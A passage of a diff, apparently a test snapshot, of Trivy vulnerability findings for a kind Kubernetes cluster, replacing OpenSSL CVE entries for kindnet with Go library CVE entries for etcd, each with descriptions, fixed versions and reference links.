"https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4@%3Cissues.bookkeeper.apache.org%3E", - "https://nvd.nist.gov/vuln/detail/CVE-2021-23840", - "https://rustsec.org/advisories/RUSTSEC-2021-0057.html", - "https://security.gentoo.org/glsa/202103-03", - "https://security.netapp.com/advisory/ntap-20210219-0009/", - "https://ubuntu.com/security/notices/USN-4738-1", - "https://ubuntu.com/security/notices/USN-5088-1", - "https://www.cve.org/CVERecord?id=CVE-2021-23840", - "https://www.debian.org/security/2021/dsa-4855", - "https://www.openssl.org/news/secadv/20210216.txt", - "https://www.oracle.com//security-alerts/cpujul2021.html", - "https://www.oracle.com/security-alerts/cpuApr2021.html", - "https://www.oracle.com/security-alerts/cpuapr2022.html", - "https://www.oracle.com/security-alerts/cpujan2022.html", - "https://www.oracle.com/security-alerts/cpuoct2021.html", - "https://www.tenable.com/security/tns-2021-03", - "https://www.tenable.com/security/tns-2021-09", - "https://www.tenable.com/security/tns-2021-10", + "https://access.redhat.com/security/cve/CVE-2021-38561", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38561", + "https://deps.dev/advisory/OSV/GO-2021-0113", + "https://github.com/advisories/GHSA-ppp9-7jff-5vj2", + "https://go.dev/cl/340830", + "https://go.googlesource.com/text/+/383b2e75a7a4198c42f8f87833eefb772868a56f", + "https://groups.google.com/g/golang-announce", + "https://nvd.nist.gov/vuln/detail/CVE-2021-38561", + "https://pkg.go.dev/golang.org/x/text/language", + "https://pkg.go.dev/vuln/GO-2021-0113", + "https://ubuntu.com/security/notices/USN-5873-1", + "https://www.cve.org/CVERecord?id=CVE-2021-38561", ], }, "category": "Vulnerability", - "description": "Calls to EVP_CipherUpdate, EVP_EncryptUpdate and EVP_DecryptUpdate may overflow the output length argument in some cases where the input length is close to the maximum permissable length for an integer on the platform. In such cases the return value from the function call will be 1 (indicating success), but the output length value will be negative. This could cause applications to behave incorrectly or crash. OpenSSL versions 1.1.1i and below are affected by this issue. Users of these versions should upgrade to OpenSSL 1.1.1j. OpenSSL versions 1.0.2x and below are affected by this issue. However OpenSSL 1.0.2 is out of support and no longer receiving public updates. Premium support customers of OpenSSL 1.0.2 should upgrade to 1.0.2y. Other users should upgrade to 1.1.1j. Fixed in OpenSSL 1.1.1j (Affected 1.1.1-1.1.1i). Fixed in OpenSSL 1.0.2y (Affected 1.0.2-1.0.2x).", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "golang.org/x/text/language in golang.org/x/text before 0.3.7 can panic with an out-of-bounds read during BCP 47 language tag parsing. Index calculation is mishandled. If parsing untrusted user input, this can be used as a vector for a denial-of-service attack.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", "mitigation": undefined, - "name": "openssl: integer overflow in CipherUpdate", + "name": "out-of-bounds read in golang.org/x/text/language leads to DoS", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-23840", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-23840", - }, - { - "type": "URL", - "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf", + "value": "https://avd.aquasec.com/nvd/cve-2021-38561", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23840", + "value": "https://access.redhat.com/security/cve/CVE-2021-38561", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=6a51b9e1d0cf0bf8515f7201b68fb0a3482b3dc1", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38561", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9b1129239f3ebb1d1c98ce9ed41d5c9476c47cb2", + "value": "https://deps.dev/advisory/OSV/GO-2021-0113", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-qgm6-9472-pwq7", + "value": "https://github.com/advisories/GHSA-ppp9-7jff-5vj2", }, { "type": "URL", - "value": "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44846", + "value": "https://go.dev/cl/340830", }, { "type": "URL", - "value": "https://kc.mcafee.com/corporate/index?page=content&id=SB10366", + "value": "https://go.googlesource.com/text/+/383b2e75a7a4198c42f8f87833eefb772868a56f", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-23840.html", + "value": "https://groups.google.com/g/golang-announce", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-9561.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-38561", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b@%3Cissues.bookkeeper.apache.org%3E", + "value": "https://pkg.go.dev/golang.org/x/text/language", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4@%3Cissues.bookkeeper.apache.org%3E", + "value": "https://pkg.go.dev/vuln/GO-2021-0113", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-23840", + "value": "https://ubuntu.com/security/notices/USN-5873-1", }, { "type": "URL", - "value": "https://rustsec.org/advisories/RUSTSEC-2021-0057.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-38561", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": "0.3.8", + "foundIn": "Target: 'usr/local/bin/etcd' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-32149", + "installedVersion": "v0.3.6", + "packageName": "golang.org/x/text", + "references": [ + "https://access.redhat.com/security/cve/CVE-2022-32149", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32149", + "https://github.com/advisories/GHSA-69ch-w2m2-3vjp", + "https://github.com/golang/go/issues/56152", + "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c", + "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c (v0.3.8)", + "https://go.dev/cl/442235", + "https://go.dev/issue/56152", + "https://groups.google.com/g/golang-announce/c/-hjNw559_tE/m/KlGTfid5CAAJ", + "https://groups.google.com/g/golang-dev/c/qfPIly0X7aU", + "https://nvd.nist.gov/vuln/detail/CVE-2022-32149", + "https://pkg.go.dev/vuln/GO-2022-1059", + "https://ubuntu.com/security/notices/USN-5873-1", + "https://www.cve.org/CVERecord?id=CVE-2022-32149", + ], + }, + "category": "Vulnerability", + "description": "An attacker may cause a denial of service by crafting an Accept-Language header which ParseAcceptLanguage will take significant time to parse.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", + "mitigation": undefined, + "name": "ParseAcceptLanguage takes a long time to parse complex tags", + "references": [ { "type": "URL", - "value": "https://security.gentoo.org/glsa/202103-03", + "value": "https://avd.aquasec.com/nvd/cve-2022-32149", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20210219-0009/", + "value": "https://access.redhat.com/security/cve/CVE-2022-32149", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4738-1", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32149", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5088-1", + "value": "https://github.com/advisories/GHSA-69ch-w2m2-3vjp", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-23840", + "value": "https://github.com/golang/go/issues/56152", }, { "type": "URL", - "value": "https://www.debian.org/security/2021/dsa-4855", + "value": "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20210216.txt", + "value": "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c (v0.3.8)", }, { "type": "URL", - "value": "https://www.oracle.com//security-alerts/cpujul2021.html", + "value": "https://go.dev/cl/442235", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuApr2021.html", + "value": "https://go.dev/issue/56152", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", + "value": "https://groups.google.com/g/golang-announce/c/-hjNw559_tE/m/KlGTfid5CAAJ", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpujan2022.html", + "value": "https://groups.google.com/g/golang-dev/c/qfPIly0X7aU", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuoct2021.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-32149", }, { "type": "URL", - "value": "https://www.tenable.com/security/tns-2021-03", + "value": "https://pkg.go.dev/vuln/GO-2022-1059", }, { "type": "URL", - "value": "https://www.tenable.com/security/tns-2021-09", + "value": "https://ubuntu.com/security/notices/USN-5873-1", }, { "type": "URL", - "value": "https://www.tenable.com/security/tns-2021-10", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-32149", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "1.1.1d-0+deb10u7", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-3712", - "installedVersion": "1.1.1d-0+deb10u4", - "packageName": "libssl1.1", + "fixedVersion": "0.0.0-20220314234659-1baeb1ce4c0b", + "foundIn": "Target: 'usr/local/bin/etcd-3.5.3' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-27191", + "installedVersion": "v0.0.0-20220131195533-30dcbda58838", + "packageName": "golang.org/x/crypto", "references": [ - "http://www.openwall.com/lists/oss-security/2021/08/26/2", - "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-3712.json", - "https://access.redhat.com/security/cve/CVE-2021-3712", - "https://cert-portal.siemens.com/productcert/pdf/ssa-244969.pdf", - "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3712", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=94d23fcff9b2a7a8368dfe52214d5c2569882c11", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=ccb0a11145ee72b042d10593a64eaf9e8a55ec12", - "https://github.com/advisories/GHSA-q9wj-f4qw-6vfj", - "https://kc.mcafee.com/corporate/index?page=content&id=SB10366", - "https://linux.oracle.com/cve/CVE-2021-3712.html", - "https://linux.oracle.com/errata/ELSA-2022-9023.html", - "https://lists.apache.org/thread.html/r18995de860f0e63635f3008fd2a6aca82394249476d21691e7c59c9e@%3Cdev.tomcat.apache.org%3E", - "https://lists.apache.org/thread.html/rad5d9f83f0d11fb3f8bb148d179b8a9ad7c6a17f18d70e5805a713d1@%3Cdev.tomcat.apache.org%3E", - "https://lists.debian.org/debian-lts-announce/2021/09/msg00014.html", - "https://lists.debian.org/debian-lts-announce/2021/09/msg00021.html", - "https://nvd.nist.gov/vuln/detail/CVE-2021-3712", - "https://rustsec.org/advisories/RUSTSEC-2021-0098.html", - "https://security.gentoo.org/glsa/202209-02", - "https://security.gentoo.org/glsa/202210-02", - "https://security.netapp.com/advisory/ntap-20210827-0010/", - "https://ubuntu.com/security/notices/USN-5051-1", - "https://ubuntu.com/security/notices/USN-5051-2", - "https://ubuntu.com/security/notices/USN-5051-3", - "https://ubuntu.com/security/notices/USN-5051-4 (regression only in trusty/esm)", - "https://ubuntu.com/security/notices/USN-5088-1", - "https://www.cve.org/CVERecord?id=CVE-2021-3712", - "https://www.debian.org/security/2021/dsa-4963", - "https://www.openssl.org/news/secadv/20210824.txt", - "https://www.oracle.com/security-alerts/cpuapr2022.html", - "https://www.oracle.com/security-alerts/cpujan2022.html", - "https://www.oracle.com/security-alerts/cpuoct2021.html", - "https://www.tenable.com/security/tns-2021-16", - "https://www.tenable.com/security/tns-2022-02", + "https://access.redhat.com/errata/RHSA-2022:8008", + "https://access.redhat.com/security/cve/CVE-2022-27191", + "https://bugzilla.redhat.com/1939485", + "https://bugzilla.redhat.com/1989564", + "https://bugzilla.redhat.com/1989570", + "https://bugzilla.redhat.com/1989575", + "https://bugzilla.redhat.com/2064702", + "https://bugzilla.redhat.com/2121445", + "https://bugzilla.redhat.com/2121453", + "https://errata.almalinux.org/9/ALSA-2022-8008.html", + "https://github.com/advisories/GHSA-8c26-wmh5-6g9v", + "https://go.dev/cl/392355", + "https://go.googlesource.com/crypto/+/1baeb1ce4c0b006eff0f294c47cb7617598dfb3d", + "https://groups.google.com/g/golang-announce", + "https://groups.google.com/g/golang-announce/c/-cp44ypCT5s", + "https://groups.google.com/g/golang-announce/c/-cp44ypCT5s/m/wmegxkLiAQAJ", + "https://linux.oracle.com/cve/CVE-2022-27191.html", + "https://linux.oracle.com/errata/ELSA-2022-8008.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DLUJZV3HBP56ADXU6QH2V7RNYUPMVBXQ/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EZ3S7LB65N54HXXBCB67P4TTOHTNPP5O/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HHGBEGJ54DZZGTXFUQNS7ZIG3E624YAF/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/J5WPM42UR6XIBQNQPNQHM32X7S4LJTRX/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QTFOIDHQRGNI4P6LYN6ILH5G443RYYKB/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YHYRQB7TRMHDB3NEHW5XBRG7PPMUTPGV/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZFUNHFHQVJSADNH7EZ3B53CYDZVEEPBP/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZQNPPQWSTP2IX7SHE6TS4SP4EVMI5EZK/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-27191", + "https://pkg.go.dev/vuln/GO-2021-0356", + "https://raw.githubusercontent.com/golang/vulndb/df2d3d326300e2ae768f00351ffa96cc2c56cf54/reports/GO-2021-0356.yaml", + "https://security.netapp.com/advisory/ntap-20220429-0002/", + "https://www.cve.org/CVERecord?id=CVE-2022-27191", ], }, "category": "Vulnerability", - "description": "ASN.1 strings are represented internally within OpenSSL as an ASN1_STRING structure which contains a buffer holding the string data and a field holding the buffer length. This contrasts with normal C strings which are repesented as a buffer for the string data which is terminated with a NUL (0) byte. Although not a strict requirement, ASN.1 strings that are parsed using OpenSSL's own "d2i" functions (and other similar parsing functions) as well as any string whose value has been set with the ASN1_STRING_set() function will additionally NUL terminate the byte array in the ASN1_STRING structure. However, it is possible for applications to directly construct valid ASN1_STRING structures which do not NUL terminate the byte array by directly setting the "data" and "length" fields in the ASN1_STRING array. This can also happen by using the ASN1_STRING_set0() function. Numerous OpenSSL functions that print ASN.1 data have been found to assume that the ASN1_STRING byte array will be NUL terminated, even though this is not guaranteed for strings that have been directly constructed. Where an application requests an ASN.1 structure to be printed, and where that ASN.1 structure contains ASN1_STRINGs that have been directly constructed by the application without NUL terminating the "data" field, then a read buffer overrun can occur. The same thing can also occur during name constraints processing of certificates (for example if a certificate has been directly constructed by the application instead of loading it via the OpenSSL parsing functions, and the certificate contains non NUL terminated ASN1_STRING structures). It can also occur in the X509_get1_email(), X509_REQ_get1_email() and X509_get1_ocsp() functions. If a malicious actor can cause an application to directly construct an ASN1_STRING and then process it through one of the affected OpenSSL functions then this issue could be hit. This might result in a crash (causing a Denial of Service attack). It could also result in the disclosure of private memory contents (such as private keys, or sensitive plaintext). Fixed in OpenSSL 1.1.1l (Affected 1.1.1-1.1.1k). Fixed in OpenSSL 1.0.2za (Affected 1.0.2-1.0.2y).", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "The golang.org/x/crypto/ssh package before 0.0.0-20220314234659-1baeb1ce4c0b for Go allows an attacker to crash a server in certain circumstances involving AddHostKey.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", "mitigation": undefined, - "name": "openssl: Read buffer overruns processing ASN.1 strings", + "name": "crash in a golang.org/x/crypto/ssh server", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-3712", - }, - { - "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2021/08/26/2", - }, - { - "type": "URL", - "value": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-3712.json", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-3712", - }, - { - "type": "URL", - "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-244969.pdf", - }, - { - "type": "URL", - "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf", - }, - { - "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3712", + "value": "https://avd.aquasec.com/nvd/cve-2022-27191", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=94d23fcff9b2a7a8368dfe52214d5c2569882c11", + "value": "https://access.redhat.com/errata/RHSA-2022:8008", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=ccb0a11145ee72b042d10593a64eaf9e8a55ec12", + "value": "https://access.redhat.com/security/cve/CVE-2022-27191", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-q9wj-f4qw-6vfj", + "value": "https://bugzilla.redhat.com/1939485", }, { "type": "URL", - "value": "https://kc.mcafee.com/corporate/index?page=content&id=SB10366", + "value": "https://bugzilla.redhat.com/1989564", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-3712.html", + "value": "https://bugzilla.redhat.com/1989570", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-9023.html", + "value": "https://bugzilla.redhat.com/1989575", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r18995de860f0e63635f3008fd2a6aca82394249476d21691e7c59c9e@%3Cdev.tomcat.apache.org%3E", + "value": "https://bugzilla.redhat.com/2064702", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rad5d9f83f0d11fb3f8bb148d179b8a9ad7c6a17f18d70e5805a713d1@%3Cdev.tomcat.apache.org%3E", + "value": "https://bugzilla.redhat.com/2121445", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2021/09/msg00014.html", + "value": "https://bugzilla.redhat.com/2121453", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2021/09/msg00021.html", + "value": "https://errata.almalinux.org/9/ALSA-2022-8008.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3712", + "value": "https://github.com/advisories/GHSA-8c26-wmh5-6g9v", }, { "type": "URL", - "value": "https://rustsec.org/advisories/RUSTSEC-2021-0098.html", + "value": "https://go.dev/cl/392355", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202209-02", + "value": "https://go.googlesource.com/crypto/+/1baeb1ce4c0b006eff0f294c47cb7617598dfb3d", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202210-02", + "value": "https://groups.google.com/g/golang-announce", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20210827-0010/", + "value": "https://groups.google.com/g/golang-announce/c/-cp44ypCT5s", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5051-1", + "value": "https://groups.google.com/g/golang-announce/c/-cp44ypCT5s/m/wmegxkLiAQAJ", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5051-2", + "value": "https://linux.oracle.com/cve/CVE-2022-27191.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5051-3", + "value": "https://linux.oracle.com/errata/ELSA-2022-8008.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5051-4 (regression only in trusty/esm)", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DLUJZV3HBP56ADXU6QH2V7RNYUPMVBXQ/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5088-1", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EZ3S7LB65N54HXXBCB67P4TTOHTNPP5O/", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-3712", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HHGBEGJ54DZZGTXFUQNS7ZIG3E624YAF/", }, { "type": "URL", - "value": "https://www.debian.org/security/2021/dsa-4963", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/J5WPM42UR6XIBQNQPNQHM32X7S4LJTRX/", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20210824.txt", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QTFOIDHQRGNI4P6LYN6ILH5G443RYYKB/", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpujan2022.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YHYRQB7TRMHDB3NEHW5XBRG7PPMUTPGV/", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuoct2021.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", }, { "type": "URL", - "value": "https://www.tenable.com/security/tns-2021-16", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZFUNHFHQVJSADNH7EZ3B53CYDZVEEPBP/", }, { "type": "URL", - "value": "https://www.tenable.com/security/tns-2022-02", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZQNPPQWSTP2IX7SHE6TS4SP4EVMI5EZK/", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "1.1.1d-0+deb10u8", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-0778", - "installedVersion": "1.1.1d-0+deb10u4", - "packageName": "libssl1.1", - "references": [ - "http://packetstormsecurity.com/files/167344/OpenSSL-1.0.2-1.1.1-3.0-BN_mod_sqrt-Infinite-Loop.html", - "http://seclists.org/fulldisclosure/2022/May/33", - "http://seclists.org/fulldisclosure/2022/May/35", - "http://seclists.org/fulldisclosure/2022/May/38", - "https://access.redhat.com/errata/RHSA-2022:5326", - "https://access.redhat.com/security/cve/CVE-2022-0778", - "https://bugzilla.redhat.com/2062202", - "https://bugzilla.redhat.com/show_bug.cgi?id=2062202", - "https://cert-portal.siemens.com/productcert/pdf/ssa-712929.pdf", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0778", - "https://errata.almalinux.org/8/ALSA-2022-5326.html", - "https://errata.rockylinux.org/RLSA-2022:4899", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=3118eb64934499d93db3230748a452351d1d9a65", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=380085481c64de749a6dd25cdf0bcf4360b30f83", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=a466912611aa6cbdf550cd10601390e587451246", - "https://github.com/advisories/GHSA-x3mh-jvjw-3xwx", - "https://linux.oracle.com/cve/CVE-2022-0778.html", - "https://linux.oracle.com/errata/ELSA-2022-9272.html", - "https://lists.debian.org/debian-lts-announce/2022/03/msg00023.html", - "https://lists.debian.org/debian-lts-announce/2022/03/msg00024.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/323SNN6ZX7PRJJWP2BUAFLPUAE42XWLZ/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GDB3GQVJPXJE7X5C5JN6JAA4XUDWD6E6/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/W6K3PR542DXWLEFFMFIDMME4CWMHJRMG/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-0778", - "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2022-0002", - "https://rustsec.org/advisories/RUSTSEC-2022-0014.html", - "https://security.gentoo.org/glsa/202210-02", - "https://security.netapp.com/advisory/ntap-20220321-0002/", - "https://security.netapp.com/advisory/ntap-20220429-0005/", - "https://support.apple.com/kb/HT213255", - "https://support.apple.com/kb/HT213256", - "https://support.apple.com/kb/HT213257", - "https://ubuntu.com/security/notices/USN-5328-1", - "https://ubuntu.com/security/notices/USN-5328-2", - "https://www.cve.org/CVERecord?id=CVE-2022-0778", - "https://www.debian.org/security/2022/dsa-5103", - "https://www.openssl.org/news/secadv/20220315.txt", - "https://www.oracle.com/security-alerts/cpuapr2022.html", - "https://www.oracle.com/security-alerts/cpujul2022.html", - "https://www.tenable.com/security/tns-2022-06", - "https://www.tenable.com/security/tns-2022-07", - "https://www.tenable.com/security/tns-2022-08", - "https://www.tenable.com/security/tns-2022-09", - ], - }, - "category": "Vulnerability", - "description": "The BN_mod_sqrt() function, which computes a modular square root, contains a bug that can cause it to loop forever for non-prime moduli. Internally this function is used when parsing certificates that contain elliptic curve public keys in compressed form or explicit elliptic curve parameters with a base point encoded in compressed form. It is possible to trigger the infinite loop by crafting a certificate that has invalid explicit curve parameters. Since certificate parsing happens prior to verification of the certificate signature, any process that parses an externally supplied certificate may thus be subject to a denial of service attack. The infinite loop can also be reached when parsing crafted private keys as they can contain explicit elliptic curve parameters. Thus vulnerable situations include: - TLS clients consuming server certificates - TLS servers consuming client certificates - Hosting providers taking certificates or private keys from customers - Certificate authorities parsing certification requests from subscribers - Anything else which parses ASN.1 elliptic curve parameters Also any other applications that use the BN_mod_sqrt() where the attacker can control the parameter values are vulnerable to this DoS issue. In the OpenSSL 1.0.2 version the public key is not parsed during initial parsing of the certificate which makes it slightly harder to trigger the infinite loop. However any operation which requires the public key from the certificate will trigger the infinite loop. In particular the attacker can use a self-signed certificate to trigger the loop during verification of the certificate signature. This issue affects OpenSSL versions 1.0.2, 1.1.1 and 3.0. It was addressed in the releases of 1.1.1n and 3.0.2 on the 15th March 2022. Fixed in OpenSSL 3.0.2 (Affected 3.0.0,3.0.1). Fixed in OpenSSL 1.1.1n (Affected 1.1.1-1.1.1m). Fixed in OpenSSL 1.0.2zd (Affected 1.0.2-1.0.2zc).", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "openssl: Infinite loop in BN_mod_sqrt() reachable when parsing certificates", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-0778", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", }, { "type": "URL", - "value": "http://packetstormsecurity.com/files/167344/OpenSSL-1.0.2-1.1.1-3.0-BN_mod_sqrt-Infinite-Loop.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-27191", }, { "type": "URL", - "value": "http://seclists.org/fulldisclosure/2022/May/33", + "value": "https://pkg.go.dev/vuln/GO-2021-0356", }, { "type": "URL", - "value": "http://seclists.org/fulldisclosure/2022/May/35", + "value": "https://raw.githubusercontent.com/golang/vulndb/df2d3d326300e2ae768f00351ffa96cc2c56cf54/reports/GO-2021-0356.yaml", }, { "type": "URL", - "value": "http://seclists.org/fulldisclosure/2022/May/38", + "value": "https://security.netapp.com/advisory/ntap-20220429-0002/", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:5326", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-27191", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": "0.0.0-20211209124913-491a49abca63", + "foundIn": "Target: 'usr/local/bin/etcd-3.5.3' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2021-44716", + "installedVersion": "v0.0.0-20211112202133-69e39bad7dc2", + "packageName": "golang.org/x/net", + "references": [ + "https://access.redhat.com/security/cve/CVE-2021-44716", + "https://cert-portal.siemens.com/productcert/pdf/ssa-744259.pdf", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44716", + "https://github.com/advisories/GHSA-vc3p-29h2-gpcp", + "https://github.com/golang/go/commit/48d948963c5ce7add72af5665a871caff6c1d35a (go1.17.5)", + "https://github.com/golang/go/issues/50058", + "https://github.com/golang/net/commit/491a49abca63de5e07ef554052d180a1b5fe2d70", + "https://go.dev/cl/369794", + "https://go.dev/issue/50058", + "https://groups.google.com/g/golang-announce/c/hcmEScgc00k", + "https://groups.google.com/g/golang-announce/c/hcmEScgc00k/m/ZWnOjeY4CQAJ", + "https://linux.oracle.com/cve/CVE-2021-44716.html", + "https://linux.oracle.com/errata/ELSA-2022-0001.html", + "https://lists.debian.org/debian-lts-announce/2022/01/msg00016.html", + 